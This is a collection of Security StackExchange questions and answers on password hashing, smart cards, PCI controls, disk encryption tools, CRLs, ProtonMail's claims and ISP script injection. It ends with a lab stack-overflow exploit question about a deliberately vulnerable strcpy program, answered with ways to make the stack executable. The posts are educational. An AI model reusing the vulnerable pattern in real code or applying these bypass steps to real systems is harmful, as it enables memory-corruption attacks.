I can keep track of the hashes I used to make password checks possible. I am expecting to get a bunch of answers discussing the inefficiency of the hashing algorithm (how long it takes, how much memory it will take to store the hashes, etc), but assuming I have a supercomputer w/ 800 petabytes of storage, and all I care about is maximum security, would all these steps help? | This basically looks like something along the lines of PBKDF2 or sha512crypt, only with a bunch of "cryptographic voodoo" applied. Salts have a very specific cryptographic purpose: to tie an password-guessing attempt to a single password instance. Having company-specific salts, user-specific salts, per-iteration salts, and (to steal a snark ) hand-harvested, shade-grown, organic pink Himalayan salts are unnecessary and have poorly-defined (or undefined) security properties. While this doesn't necessarily create a weakness, in general, one should use the absolute minimum amount of cryptography necessary to solve a particular problem. Having a variable number of iterations likewise doesn't improve anything. In the best case, all an attacker has to do is compare the hash after every iteration. While yes, this is slightly more work, it doesn't change the big-O complexity of cracking the password hash. In the worst case, the attacker knows the algorithm and so this does nothing to improve security. As always, Kerckhoff's principle is apropos: assume the attacker knows everything about your cryptosystem besides the key. In some ways, your hashing scheme is overengineered. In other ways, it's underengineered. For instance, the Catena password hashing function is one of the leading contenders for the PHC , an open competition attempting to spur the development of next-generation password hashing schemes and to choose one for the industry to standardize upon. It has several features yours lacks. They recommend (based on my suggestion, actually) the use of BLAKE2b as the internal hashing function. This is a superior choice to SHA-2/256 or SHA-2/512 for most typical password-hashing scenarios, as BLAKE2b is as fast to compute in general-purpose hardware (e.g., typical server CPUs) as it is in specialized hardware (GPUs, FPGAs, or ASICs). This minimizes any advantage an attacker has over a defender, by ensuring that the defender can calculate a password hash roughly as fast on server hardware as a motivated attacker can do with dedicated password-cracking hardware. Memory-hardness is another advantage of Catena. The point of doing a large number of iterations is to require a significant amount of work to compute a single password guess; this helps offset the relatively low amount of entropy in a typical password. However, modern algorithms do better than that. They can require a tunable amount of memory to compute a password hash. This can be an extremely effective defense against specialized multicore hardware. High-end GPUs (like the AMD FirePro D-Series can have thousands of cores. The D700, for example, has 2,048 cores and only 6GB of memory. If it requires 32MiB of memory to attempt a single password hash, the attacker can at best only use 192 of those cores. They also may be limited even moreso by memory bandwidth, slowing down cracking attempts further. A particularly challenging component of this type of feature is ensuring there are no favorable time-memory tradeoffs, where an attacker can reduce the memory requirement by using more CPUs (Catena has formal a proof of this feature). Catena can also be used to increase the hardness parameters after the password has been hashed, without requiring the original password. This allows a site operator to dynamically increase the difficulty of hashing passwords as computers get faster, even for users that haven't been recently active. There are other features that password-hashing schemes can implement that yours doesn't (or attempts to, poorly). Your approach to a company-specific salt appears to be an attempt to strongly tie a password hash to a secret. Much more cryptographically sound is to require a cryptographic key as input to your hashing function, and to HMAC the password with the secret key prior to running it through the iterative hashing. This ensures that the output cannot be computed by an attacker without getting access to a key. Storing this secret in your source code directly (as you suggest) is a security antipattern, as it grants access to this secret to any employee, contractor, or service with read privileges to your source code (e.g., GitHub or Travis CI). Lastly, your scheme uses has poor cryptographic "hygeine" (for lack of a better term). Simply concatenating strings being input to hash functions is, while in this case not necessarily broken, a cryptographic antipattern. Cryptographers tend to prefer constructs like HMAC when combining secret data and user input, and prefer unambiguous encodings when combining multiple inputs (e.g., to disambiguate between H("test1" + "test2") and H("test" + "1test2") ). These avoid some attacks against many classes of hashing functions, and while they may not be strictly necessary in this case cryptographers tend to be very conservative when it comes to allowing any potential source of attack, even if it's not currently obvious how it could be exploited; seemingly minor oversights in cryptographic protocols are exploited all the time. TL;DR, password hashing is complicated. Don't roll your own. For now, use bcrypt, scrypt, or PBKDF2. And yes, you are definitely rolling your own even if you're not writing your own hash function; you're writing (effectively) a key derivation function, which is arguably a much harder cryptographic problem. As Thomas Ptacek once said : I don't care what you write, but if you go into it thinking that the dangerous stuff is in the primitives like the AES core, and if you just stick to the glue you'll be safe, you're gonna have a bad time. EDIT: To address your additional questions below: The only purpose of a salt , cryptographically speaking, is to ensure that two identical passwords hash to different results. This tightly binds a password-cracking attempt to an specific hashed password, rather than to the password database as a whole. This should be the case even if you consider "the password database" to be the merged set of all hashed passwords across all systems globally — the work to crack one password should never be reusable to crack another person's password. Given this definition of a salt, it should be clear that company-specific "salts", user-specific "salts" (e.g., one bound to a specific user rather than to the password itself), etc. are not in fact salts but are something else of your own invention. Storing one large, globally-unique salt (e.g., a randomly-chosen 128-bit value) is enough to ensure global uniqueness of that password. Likewise, continually hashing the salt into each iteration does not contribute in any meaningful way toward the expected function of a salt. Hashing it in at the beginning is enough to ensure that an attacker cannot reuse any of the computation to attempt other passwords. That said, there is benefit in hashing something additional in at each step. A theoretical weakness of iterated hashes is their ability to enter what's called a "short cycle". Essentially, we know that hashes have collisions (it's just impractically/impossibly difficult to find them). If you were to run a value through a 128-bit hash 2^128+1 times, you are guaranteed to have generated at least one collision (as you've enumerated the entire output space); this would put you into a cycle, where each successive hash output is the same as the previous time you hashed that value. However, statistically, it's expected that you do not need to go through all 2^128 values to generate a cycle; it's entirely plausible that there's some x such that x = H(H(x)) . Or more generally, some x and n < 2^128 such that x = H^n(x) . This is a short cycle. To prevent a short cycle, we need to ensure that each invocation of the hash is guaranteed to be unique. A trivial way of doing this is including the iteration counter in the inputs to the hash; e.g., H(x || i) . We don't know that x will be unique for each iteration of the hash, but we do know that i will be. This doesn't negate the possibility of a collision in hash outputs at some step, but if a collision does happen, we know that the next iterated output is still overwhelmingly likely to be unique. | {
"source": [
"https://security.stackexchange.com/questions/71934",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36971/"
]
} |
71,996 | I recently installed Bitlocker on my Windows 8.1 machine, using only a password. I was thinking of getting something other than just a password for my storage drive, something physical, like a USB, SD Card, or Smart Card! I've asked and poked around, and people claim the following: When given the choice of a Smart Card and another storage medium for 2FA, or regular authentication, go for the Smart Card, as it is safer. I can't really find why it would be safer, an encrypted SD Card switched to "read only" with the side switch would just be as safe as the Smart card, correct? (That is to say, a USB drive can be overwritten by Malware, etc.). Is this advice accurate? Why or why not? Is a Smart Card indeed safer? | A smart card works by keeping a secret hidden and answering a challenge that proves it has the secret. It, theoretically, should never reveal that secret to anyone and it should be unrecoverable. There are some technical ways you might be able to get around it, but most of them are destructive to the card. This means you know if your smartcard has been compromised. An encrypted USB drive or memory card on the other hand can simply be copied. There is no mechanism protecting it from being cloned by an attacker. There are some USB sticks that do provide hardware protection to prevent unauthorized access and these would make a more viable option, but it would be a toss up as to whether even those were as well protected as a good smartcard. | {
"source": [
"https://security.stackexchange.com/questions/71996",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45233/"
]
} |
72,015 | First of all, I'm sorry if this has been discussed many times. I read many posts about PCI compliance but there are some small things I'm not quite sure about. Suppose there is Mr. GoodGuy, an honest software developer. He develops the main software architecture, and the company trusts him and gives all the access he reasonably need. This software stores credit card numbers for recurring payment management, and software uses a credit card gateway to charge the renewal amount. Mr. GoodGuy could write some code that would decrypt the card for a user, no matter what level of security the software has (encryption key in a secured server location, per-user keys, or anything), the software itself can somehow decrypt the card data. That means, even though the developer is honest, he could access card data. What are the possible solutions that other companies have implemented that prevents someone from using the software to access card details? This is not really about card details. It can be anything like online file storage services, medical data, or anything. How can a developer can make sure he won't be able to access the data as he wants, but make it possible for software to to access them (without user participation) PS: I'm Mr. GoodGuy here and I have no intention do anything bad. I'm wondering how other companies deal with this. Do they trust the developers? Even if he's resigning, he can take the key file with him. Flushing all stored cards is not an option here either since it can send many existing sales off. | PCI DSS sections 6, 7, and 8 all bear on this question. For example, part of 6.3.2 which requires code review: Code changes are reviewed by individuals other than the originating
code author, and by individuals knowledgeable about code-review
techniques and secure coding practices. 6.4 with change control: A separation of duties between personnel assigned to the
development/test environments and those assigned to the production
environment. 7.1 controlling access... in many environments the developer who writes code never accesses the operational systems where it's used with live data: Limit access to system components and cardholder data to only those
individuals whose job requires such access. And a touch of 8.7 to put restraints on those people with access: Examine database and application configuration settings to verify
that all user access to, user queries of, and user actions on (for
example, move, copy, delete), the database are through programmatic
methods only (for example, through stored procedures). Now, that all said, can a trusted insider every be perfectly defended against? No, because of the very definition of "trusted". This is true in all places (how many spies have been "trusted"? John Anthony Walker comes to mind.) But there are best practices for defending against such a threat , for mitigating them, and the PCI DSS formalizes as requirements a number of these practices (for credit cards... other secrets are on their own!) (And @Stephen-Touset points out, 3.5.2 requires: Store secret and private keys used to encrypt/decrypt cardholder
data in one (or more) of the following forms at all times: And one of those ways is: Within a secure cryptographic device (such as a host security module
(HSM) or PTS-approved point-of-interaction device) Which has the advantage of escrowing the actual key material away from day-to-day users and administrators.) | {
"source": [
"https://security.stackexchange.com/questions/72015",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8411/"
]
} |
72,091 | Is it fundamentally possible to validate that an unmodified version of your client connects to your server? I was just thinking about the idea of having my client-side app hash its own source code and sends that as a key to the server with any requests as proof that it's unmodified, but that's silly because anyone could just have the client send a hash of the unmodified version via a modified version. I was wondering if there might be a secure way to do this though, via some sort of proof that the client was unmodified. | It is fundamentally impossible to validate a client on a system you don't control. That doesn't mean it can't be done to a sufficient degree. eBook readers, for example, generally try to ensure the client is authentic. They (seem to) do so in a manner that is secure enough to defend against their threat. Good enough to protect nuclear secrets? No. But good enough for their threat environment. Figure out how important that control is for your application, and determine the compensating controls you'll put in place to limit the damage when someone goes through the trouble of ripping apart and then mimicking your application. Don't think in terms of black/white, possible/impossible; think in terms of acceptable and achievable security. | {
"source": [
"https://security.stackexchange.com/questions/72091",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/81923/"
]
} |
72,230 | I am located in Venezuela right now, and for the whole weekend have been unable to access grubhub.com and seamless.com. Finally, I tried using the Tor Browser and got access. The same thing happened in January when I tried to access the police department's website in a New York State county when I was abroad. Is this a measure to avoid hackers? Or do they do it to avoid spending bandwidth in countries where the website doesn't serve the population? | Country-based blocking is usually put in place as a result of some organisational policy whose intention is indeed to "block hackers". This sort of things fail on three points: Such a policy assumes that malicious people can be categorized by nationality. This is old-style, World-War-I type of thinking. Geographical position is immaterial for computers; a firewall can only see IP addresses . Inferring geography from IP addresses relies on big tables that are never completely up-to-date. As you observed, working around these blocking systems is trivial for attackers; it suffices to use a relay host outside of the blocked country, and this happens "naturally" when using Tor. Most attackers will use such relays anyway, to cover their tracks. So the usual net effect of such a blocking is to irritate a few normal users (who might have been customers, but will not now that they are angry), without actually impeding the efforts of competent attackers. On the bright side, though, "country"-based blocking is sometimes put in place to prevent thousands of mindless drones from spamming the connection logs. For instance, the sysadmin might have noticed a surge of dummy connections from some botnet, most machines of which being located in Venezuela. In that case, blocking Venezuela altogether may help prevent the clogging of log files, while implying only minor impact on business (assuming that the server in question has very few honest Venezuela-based customers). Thus, it is conceivable that a risk/cost analysis has determined that such a large blocking would improve things. However, in most cases, the "country blocking" is there for the show: a whole-country blocking helps sysadmins demonstrate to managers that they are doing something for security, in a way that managers readily understand. This is the usual predicament of security: when all things work well, security is invisible. It is unfortunately hard to negotiate budgets for activities that don't imply any visible result. Even though the whole point of security is to avoid having visible results, e.g. a defaced Web site or a list of 16 millions of user passwords leaked and hitting the news. In the case of media distribution, some distributors enforce country-based blocking because they did not have whole-World retransmission rights, and by doing a modicus of blocking effort they fulfil their legal obligations. Arguably, this case is also "for the show". | {
"source": [
"https://security.stackexchange.com/questions/72230",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60097/"
]
} |
72,249 | I am looking to encrypt a few drives of mine, and my ONLY interest is security. It is OK if my VeraCrypt volumes are not compatible with TrueCrypt, and vice versa. There is a lot of talk about "TrueCrypt is dead" and it seems there are two forks out there now gaining momentum. The one more interesting to me is VeraCrypt, and from the research I have done, this looks like the "more secure" option. But is that so? That is why I am asking you all here. I know what VeraCrypt claims, I know they say they do more hash iterations of the password to derive the encryption keys. That sounds nice and all, but... Does anyone have real world experience using Veracrypt and is it as good as advertised? How does it compare to TrueCrypt? Does anyone have a security reason why they would choose TrueCrypt over VeraCrypt? Any reasons at all why TrueCrypt is preferable to you? I'm not on the "TrueCrypt is dead" bandwagon, I am just in trying to be progressive, so I would choose a newer "better" option if it is available. But with that being said, I would also choose to go with the older option if it is actually better than the newer options. Your thoughts? | I would still choose TrueCrypt for a matter of trust and the "many eyes" theory: After the "TrueCrypt scandal" everyone started looking at the source for backdoors. The TrueCrypt audit finished on April 2, 2015. They found low-risk vulnerabilities, including some that affect the bootloader full-disk-encryption feature, though there is no evidence of backdoors. If VeraCrypt start changing TrueCrypt fast, they may introduce a few vulnerabilities. Since VeraCrypt is currently less popular than TrueCrypt, there are 'less eyes' watching at the VeraCrypt source code changes. I consider that TrueCrypt 7.1a have all the features I need. An audited TrueCrypt with the vulnerabilities fixed would be the perfect choice. Unless I personally watch VeraCrypt source code diffs, it would require an audit on the changes, or a high increase in popularity, or many years of maintenance and active community to make me trust them more than the good old TrueCrypt. The increase in iterations to mitigate brute force attacks only affects performance. If you chose a 64-char random password, 1 million years of brute forcing or 10 million years is the same from a security stand point. (I downloaded the public key of TrueCrypt admin years before the scandal. So I can download a copy of TrueCrypt 7.1a from any source and verify its authenticity) This answer may change after they publish new results from the audit. Also, if you are the VeraCrypt dev, the trust argument doesn't apply (because you trust yourself). | {
"source": [
"https://security.stackexchange.com/questions/72249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60112/"
]
} |
72,343 | Most of websites that handle important information (Gmail, for instance) have some kind of brute force protection. Sometimes if you try more than X times it will lock the account or at least give you a captcha to solve. Currently all the security experts keep saying the same thing: make long, mixed chars, high entropy passwords. This makes a lot of sense if you think about a RSA key, or something that could be decrypted offline, but is it really important when we talk about online account passwords? For example, we create a password for Gmail using only 6 letters from the english alphabet. This is approximately 26^6 = 309 million combinations. If we consider that we can test 1 password per second (which I think is faster than we actually can, if you take into account the Gmail captchas), we will need up to 10 years to break and 5 years on average. Points to consider: If you use the same password on different website, another website could be hacked and you password exposed. I'm assuming that the password is unique. Used only with Gmail. If somebody can grab the database they could brute force the hash of your password offline. I'm assuming that the website uses at least a salted hash (very unlikely that the hacker will try to break all passwords) and/or is very unlikely that the database will be hacked (it's a fair assumption with Gmail) I am also assuming that your password is not a dictionary word or something easy to guess. This should rule out multiple account brute force (eg. testing the same common password across multiple accounts). Is it safe to assume that we don't need a really long password to websites as soon as we follow the other security measures?
If we suggest that people use a long password just because they normally don't follow the other security advice (use same password across accounts, etc). Aren't we really trying to fix the symptoms and not the cause? PS: Some other questions address almost the same thing, but the answers always consider that the person is using the same password across websites or that the website database is easily stolen. | The following doesn't really do this justice, but in summary... In an ideal world no, complicated passwords should not be required for online resources. But, in that ideal world we are dependent on the administrators of the system to harden systems to prevent unauthorised access to the 'password file', the following will minimise the risk: Securely configure the infrastructure; Apply patches promptly; Have some form of monitoring to identify a compromise in the event of a zero-day exploit scenario (so that users can be 'told' to change their passwords); Have and follow 'secure' programming/development methodologies; Only employ trustworthy individuals. The complete combination of which is unlikely for many sites. Weaknesses in the above list may result in exploits that enable passwords to be bypassed altogether, but irrespective of the nature of a successful exploit it is a safe bet that, after gaining unauthorised access to a system attackers will attempt to exfiltrate the password file and subsequently brute force it to aid onward compromise of other systems (by exploiting password recycling). So while there is no guarantee that a strong(er) password will prevent all bad stuff, it can help to mitigate for weaknesses in providers' solutions (whether known or not). For the avoidance of doubt we are also dependent upon the service provider to do the following: Apply hashing and salting to passwords; Ensure the password is never exchanged in clear-text. I guess for most end-users the decision about password complexity and length will come down to the information the site (and therefore password) gives access to. My recommendation is: if it is something important use a complex password so that in the event of a system compromise other people's passwords are likely to be discovered first. But if it something trivial and convenience is more important take a chance on a weaker password, but accept that a hack could lead to loss of access to the account and/or release of information from the account. For many site owners I suspect the decision to require complex passwords is a combination of FUD and the desire to minimise the impact of a critical failure of controls by increasing the amount of time to brute-force passwords, thus giving longer to rectify and minimise actual user account compromise (although if an attacker has access to password hashes they probably have sufficient system access to compromise the system in other ways anyway). | {
"source": [
"https://security.stackexchange.com/questions/72343",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60220/"
]
} |
72,498 | Usually, in programming, reusing code is always a better idea than writing your own implementation of an algorithm. If an implementation has been around for a long time and is still used by lots of projects, it is likely to be pretty well designed to begin with, have received plenty of testing and debugging, and perhaps most important someone else is in charge of maintaining it which means more time to focus on the specific software product that you are building. However, I was wondering if this principle still holds true for security-critical code, which performs tasks such as encryption and authentification, or which runs with high privilege for any reason. If one implementation of an algorithm is shared by lots of software systems, then there is a strong incentive for people to crack it, and when a flaw is found in it, it is likely to be a massive security disaster. Heartbleed and Shellshock are two recent examples that come to mind. And for closed-source examples, pick anything from Adobe :) Many different pieces of software sharing a single security-critical library also makes this library a target of choice for attackers wanting to insert a backdoor in it. In a large open-source project with lots of activity, a backdoor commit which also features plenty of other corrections (such as a code style cleanup) as a decoy is unlikely to be noticed. With all this in mind, is code reuse still considered a good practice for code doing security-critical tasks? And if so, which precautions should be taken to mitigate the aforementioned weaknesses of that approach ? | The important thing is maintenance . Regardless of whether you reused existing code or wrote your own, you will achieve decent security only if there is someone, somewhere, who understands the code and is able to keep it afloat with regards to, say, evolution of compilers and platforms. Having code without bugs is best, but in practice you must rely on the next best thing, i.e. prompt fixing of bugs (especially the bugs that can be leveraged for malicious usage, also known as vulnerabilities ), within a short time frame. If you write your own code, then the maintenance job relies squarely on your own shoulders. And that job can be very time-consuming. For instance, if you decide to write and maintain your own SSL/TLS library, and use it in production, then you must understand all the peculiarities of cryptographic implementation, in particular resistance to side channel attacks , and you must keep an eye on published attacks and countermeasures. If you have the resources for that, both in time and competence, then fine ! But the cost of maintenance must not be underestimated. Reusing an existing library, especially an opensource one that is widely used, can be quite cheaper in the long term, since maintenance is done by other people, and widespread usage ensures external scrutiny. As a bonus, you cannot be blamed for the security holes in an external library if half the World shares them. To sum up, the question is not really about code reuse, but about maintenance effort reuse. (I write all this independently of the great pedagogical qualities of writing your own code. I encourage you to do your own implementations -- but certainly not for actually using them in production. This is for learning .) | {
"source": [
"https://security.stackexchange.com/questions/72498",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60294/"
]
} |
72,570 | I noticed that at least one major CA (Comodo) publishes their CRL over HTTP rather than HTTPS. This seems to me to be somewhat of a vulnerability, as an attacker could hijack the HTTP connection that seeks to download the CRL and when HSTS is in use at the very least execute what effectively amounts to a DoS attack on the domain. (Because with HSTS active, browsers should not allow the user to bypass the invalid certificate warning; see RFC 6797 section 8.4 and section 12.1 .) While CRLs are normally signed , and it would seem that any sane implementation should reject a signed CRL that does not pass signature validation, I haven't seen any way to determine the signer of the CRL in any web browser, so even signing a replacement CRL with your own root certificate key appears to be a relatively low-risk operation. And this of course assumes that the browser requires that the CRL is signed in the first place; if not, you can just replace it with a non-signed CRL. (And of course, if the implementation does reject a signed CRL that fails signature validation, or even non-signed CRLs, it becomes trivial to trick the UA into using a certificate that has been revoked but which has not yet reached its expiration date.) Is this an actual potential problem? What checks are normally performed by UAs with regards to CRLs to prevent it from becoming an actual problem? | There is no such thing as a non-signed CRL; the signature field is mandatory, and any system that uses the CRL will verify the signature. In pure X.509 , a CRL will be deemed "acceptable" as a source of information about the revocation status of a given certificate E if it is signed by an "allowed revocation issuer": the CRL's signature must match the public key contained in an already validated certificate, whose subjectDN is equal to the issuerDN of E (you can have a distinct DN if E contains the relevant CRL distribution point extension and the CRL has a matching Issuer distribution point extension; but let's forget this additional complexity). Complete rules are exposed in section 6.3 . Note that "pure X.509" is supposed to work in the context of the Directory, the kind-of worldwide LDAP server that references everything under unambiguous Distinguished Names. Since the Directory does not really work, because it does not, as it were, exist at all, existing implementations tend to implement stricter and simpler rules. Generally speaking, a Web browser validating a certificate E issue by CA C will accept a CRL only if it is also signed by the same CA, with the same key. This rule keeps path validation simple and bounded (otherwise, you may imagine a situation where you must get a CRL for each certificate in the path, and each CRL is to be verified against another CRL issuer certificate that requires its own path validation, and so on). Therefore, producing your own CRL relatively to your own root CA is unlikely to have any actual effect. CRL, like certificates, are thus objects which are always signed, and never used without verifying that signature(*), so they can be served over plain HTTP. Using HTTPS to serve CRL is just wasted resources; it may even prevent CRL download from working since some implementations (e.g. Windows) refuse to follow HTTPS URL when validating certificates (be it for CRL, OCSP, or extra intermediate CA download), because that would mean SSL, then another certificate to validate, and possibly an endless loop. (*) I here exclude root CA "certificates", traditionally self-signed; these are not real certificates in the X.509 sense, but only objects that mimic the encoding rules of certificates. | {
"source": [
"https://security.stackexchange.com/questions/72570",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2138/"
]
} |
72,610 | Is it possible to create a Web service that encrypts all messages, such that only the writer, and the person to whom the mail is sent, can read it? In other words, is the theory behind ProtonMail valid? | Strictly speaking it is not possible, for the following reason: if the Web service encrypts the message, then the Web service gets to see the unencrypted message at some point (note: I write service , not server ). At best, the service may be honest and do its best not to have a look at the messages at they flow. Now let's see the claims of that "ProtonMail" service : Swiss Based. Well, I see no reason to find this implausible. Switzerland is a real country and there are people who live there. However, they suggest that by being a "Swiss service", the data immediately come under the cover of Swiss law, which is a rather bold statement. Electrons don't have a nationality, and, contrary to a piece of paper, an electronic message does not have a well defined geographic position at all times. Zero Access to User Data. That one is not completely true. When you write your message, you do it in their Web site. Even if all encryption technically occurs in your browser, that would still be done using the Javascript code that they send to you every time you connect to their service. If they want to read your messages without you noticing it, they can. End-to-End Encryption. This is possible, if encryption is Javascript-based on the sender's browser, and decryption is again Javascript-based on the recipient's browser. Taking into account the pitfalls of doing crypto in Javascript . Anonymous. I don't believe that one, at least not in the long term. They claim not to log anything; however, experience of past anonymous remailers shows that the logs are the only thing that stands between the remailer operators and jail, in some extreme cases (e.g. if the service is used to coordinate some terrorist actions). Almost invariably, the claim of not logging turns out to be fake after a while. On a similar note, even if the site operators are idealist enough not to log anything, eavesdropping on the network provider side is enough to get a lot of metadata and, e.g., work out who talks to who. This is called traffic analysis . It works well and no Web service can protect against that (only network-wide systems like Tor stand a theoretical chance to defeat traffic analysis). Securely communicate with other email providers. That one makes me cringe a bit. They mean that when the recipient is not a ProtonMail registered user, they send a normal email with an embedded link to their site, so that the user may download the encrypted email and the piece of Javascript that decrypts it. As they say it, this requires that you previously shared a password with the recipient by some unspecified mean. The bad part here is that it trains people to click on links received by email, and then enter their passwords on the resulting Web page. Self Destructing Messages. This one works just as well as, or as bad as, copy protections on movies. The raw fact is that if the recipient could read the message at some point, then he can get a copy indefinitely (if only by taking a photo of the screen with his smartphone). The "self destruction" is more a declaration of intent (pleeease don't save this email) than a security measure that can be really enforced. (However, automatic destruction of messages after a time will sure help the ProtonMail administrators, since they store the encrypted emails on their systems and don't want to do that indefinitely, because disk space, though cheap, is not free.) Open Source Cryptography. That one is believable, and good news. At least they don't reinvent their crypto, but use time-honoured standards (in this case, OpenPGP ). (I don't recognize any name in their list of security experts , but I don't know everybody. Effort at transparency is good.) Hardware Level Security. They don't mean a HSM ; they mean that they lock the doors of their server rooms, and use disk encryption. That last bit is weird: weren't the emails supposed to be already encrypted ? What private data remains, that they feel that it should be encrypted again ? This looks like security theatre to me. SSL Secured Connections. This is very plausible, and very much needed in order to avoid third-parties tampering with their Javascript. Not using SSL would be a killing flaw in their system. Unfortunately, they spoil the effect by adding: "To allow extremely security conscious users to further verify that they are in fact connecting to our server, we will also release the SHA3 hash for our SSL public key". Publishing the hash of your public key makes sense only if people can obtain the hash in an untamperable way; if that hash is simply pushed on your own SSL Web site then you are running in circles. Invoking the magic of "SHA3" reveals the extent of the seriousness of that claim: this really is just some more security theatre (not the least since SHA-3 does not exist yet: right now, FIPS 202 is still a draft ). (In fact they published the SHA-1 hash , not SHA-3.) Easy to Use. For that one, you will have to judge for yourself. "Ease of use" depends on who uses it. Summary: ProtonMail appears to be roughly the equivalent of using PGP, except that it is Web based, thus centralized. It brings back a lot of issues that PGP was supposed to solve, namely that there is a central server that gets to see who talks to who, and that serves the actual code repeatedly. That central server is thus a juicy target for whoever is intent on spying on people. The decentralized nature of PGP is its biggest asset against attackers; by making it Web-based, they increase the ease of use but abandon that decentralization. While ProtonMail is certainly better than plain, unencrypted email, it would be wrong to believe it to be the ultimate answer to email security. At least, they made some efforts: They use existing standards. They have an explicit threat model . Even if it is not very detailed, at least they know the expression "threat model", which puts them in the top 5% of vendors of security systems. They try to be transparent . On a less bright note, I did not see anything related to opensourceness. That is, they say that they use "open source libraries" for cryptography, but they don't actually say which libraries these are; and they don't show their own source code, either. Users are back to having a look at the Javascript code and do their own reverse-engineering, and that does not look very opensource to me. They also don't actually given any details on their protocol . Since they don't know (or so they say) the "mailbox password" of the recipient, then this begs the question of how they can push an email into that mailbox. We can infer that the mailbox includes a public/private key pair, and the mailbox password is really used to encrypt the private key, not the mailbox itself; this is what would make sense with the information they give (in particular reliance on OpenPGP). But it would be better if they said it. If the protocol is fine then it should be published; there is no reason not to do so. No source and no protocol are very bad points and they really should fix that. Summary of the summary: ProtonMail's security can be summed up as: their system is secure because they say that they are good guys, honest and all, and they claim to be competent. So that's all fine, eh ? | {
"source": [
"https://security.stackexchange.com/questions/72610",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60477/"
]
} |
72,652 | Suppose I am connected to a wifi-hotspot hosted by a malicious attacker. Further, suppose that I am accessing a login page of an fictitious email site tmail.com over insecure HTTP connection. My question is how can the attacker who owns the WiFi-hotspot steal my password by injecting the malicious JavaScript code without leaving any trace? Will URL still remain the tmail.com when I am accessing this or will it change? Where (application layer/network layer) and how (download the web page or modify network layer data) exactly the attacker will make the changes to succeed? I am asking this question purely for educational purpose. I am just curious and have no intent to harm anyone. | The ISP (here, the WiFi hotspot) is what delivers pages to you. It's of course trivial for an ISP to read unsecured traffic: Let's now consider a case where the credential submission is secured with HTTPS (so the ISP cannot sniff them right off the wire), but the HTTPS log-in page loads an unsecured script, helper.js . The ISP can inject any behavior into that non-HTTPS script before it finally serves the script to the browser. For example, the ISP can inject the instructions, " When this page submits credentials, send a copy of them to evil.example.com . " The diagram below shows secured requests and responses in green and insecure requests/responses in other colors: When your browser requests helper.js over HTTP, the malicious ISP responds with a resource that has the wrong content. Your browser has no idea what helper.js should look like, and without any integrity validation measure (like HTTPS), the browser has no idea anything is wrong. Your browser assumes it has correctly been served http://tmail.com/helper.js , because that's what it asked for and the ISP sent back a response without any complaint (e.g., the response was an HTTP 200 for /helper.js ). The fact that what your browser got is different from what the real server sent is totally irrelevant, because your browser has no way to detect that this difference occurred. Based on your comments, you seem to think that modifying a resource can only be done by redirecting the browser to another resource. This is incorrect. Consider Bob the browser, Iggy the ISP, and two servers, Alice and Mallory . First, consider the honest case: Bob wants to know Alice's favorite food. Bob says to Iggy, "Hey, Iggy, please send a GET /favoritefood to alice.com ." Iggy asks Alice about her favorite food. Alice tells him, "Pizza, but with no onions, because I hate onions." Iggy comes back to Bob and says "Hey, I have that response for your GET /favoritefood from alice.com ! She says she loves pizza, but not onions." Now let's consider a dishonest case: Bob wants to know Alice's favorite food. Bob says to Iggy, "Hey, Iggy, please send a GET /favoritefood to alice.com ." Iggy comes back to Bob and says, " 301 Moved Permanently -- ask Mallory about Alice's favorite food instead" Bob then sends Iggy to GET /favoritefood from mallory.com instead. It's a different resource, and Bob knows it's a different resource from the one he originally asked for. In this case, the browser's address bar would be different from what you originally typed in: mallory.com/favoritefood instead of alice.com/favoritefood . Now consider this case instead: Bob wants to know Alice's favorite food. Bob says to Iggy, "Hey, Iggy, please send a GET /favoritefood to alice.com ." Iggy asks Alice about her favorite food. Alice tells him, "Pizza, but with no onions, because I hate onions." Iggy comes back to Bob and says "Hey, I have that response for your GET /favoritefood from alice.com ! She says she loves to eat lots and lots of onions." There's no other resources involved. http://alice.com/favoritefood is the only resource being fetched here; Iggy simply lied about what the contents of the resource were. There is no way for Bob to detect that Iggy is lying, because there is no integrity-validating system in place. One final attempt at explanation: suppose the ISP is honest but mistakenly flipped a single bit when delivering the contents of the HTML file. Surely you would not expect such a mistake to cause the web page to load under a different domain. Now suppose that the honest ISP mistakenly flipped two bits instead of just one: again, such a mistake would never cause the domain or resource path to change. Now suppose the ISP flipped two thousand bits by honest mistake (perhaps the ISP has a faulty switch some place, or the WiFi router was hit by cosmic rays): again, no need for the domain to change. Now suppose the change was done maliciously instead of by mistake: again, the change in intent causes no change in what is actually happening. The resource path and origin, as identified in the browser's address bar, remains unchanged, while the ISP is free to change the contents of the resource (honestly or dishonestly) without detection. | {
"source": [
"https://security.stackexchange.com/questions/72652",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55595/"
]
} |
72,653 | I am trying to exploit simple stack overflow vulnerability. I have a basic code in c: #include <cstring>
int main( int argc, char** argv )
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
} compiled using -fno-stack-protector . I've already figured out the buffer length and I've successfully overwritten the EBP and EIP registers. I injected a large number of NOPs, followed with this shell code and finally inserted an address where the injected NOPs are so the code is executed. Now the problem. On the picture attached you can see the gdb output. If I run my program with malicious input it gets a SIGSEGV. Dumping the address 0xbffff880 you can see there is a lot of NOPs followed with the shell code (pink box) and finally with the address (blue box). I've thought this would work as follows: At first the 0x90909090 s and the shellcode are considered as simple data. After these (past the pink box) there is an address 0xbffff880 . I am saying to the cpu "hey there, now please execute what's on 0xbffff880 ". The cpu takes what's on the address and executes all the NOPs and the shellcode itself. However that's not happening and SIGSEGV occures. Where am I mistaken? I am trying to achieve this on Virtualbox instance of 32-bit Ubuntu 14.04 Linux 3.13.0-39-generic i686 with ASLR turned off. | Your memory address 0xbffff880 is most likely non-executable, but only read/write. There are a couple of ways you can overcome this. If that is a stack address you can use -z execstack while compiling. This will essentially make the entire stack memory executable. For a more robust solution you can write the shellcode to call mprotect on the address you are writing to. For example, the following line will mark address 0xbffff880 as read/write/executable. mprotect((void*) 0xbffff880, buffer_len, PROT_READ | PROT_WRITE | PROT_EXEC); -fno-stack-protector does not mean that the stack will be executable. It only disables other security features such as canaries or stack cookies . If these values are overwritten 